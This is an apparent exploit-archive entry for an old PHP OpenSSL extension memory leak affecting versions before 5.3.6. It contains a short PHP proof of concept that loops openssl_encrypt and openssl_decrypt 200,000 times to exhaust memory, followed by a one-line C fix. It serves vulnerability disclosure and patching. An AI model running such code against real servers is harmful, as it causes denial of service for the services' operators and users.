31 lines
No EOL
1,014 B
PHP
31 lines
No EOL
1,014 B
PHP
source: https://www.securityfocus.com/bid/46977/info
|
|
|
|
PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.
|
|
|
|
Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.
|
|
|
|
Versions prior to PHP 5.3.6 are vulnerable.
|
|
|
|
<?php
|
|
|
|
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
|
|
$pass = "r23498rui324hjbnkj";
|
|
|
|
$maxi = 200000;
|
|
$t = microtime(1);
|
|
for ($i=0;$i<$maxi; $i++){
|
|
$cr = openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
|
|
$dcr = openssl_decrypt($cr, 'des3', $pass, false, '1qazxsw2');
|
|
if ($dcr != $data.$i){
|
|
print "at step $i decryption failed\n";
|
|
}
|
|
}
|
|
$t = microtime(1)-$t;
|
|
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
|
|
?>
|
|
|
|
fixes by add this code at line 4818 at the end of openssl_decrypt:
|
|
EVP_CIPHER_CTX_cleanup(&cipher_ctx);
|
|
|
|
|
|
?>
|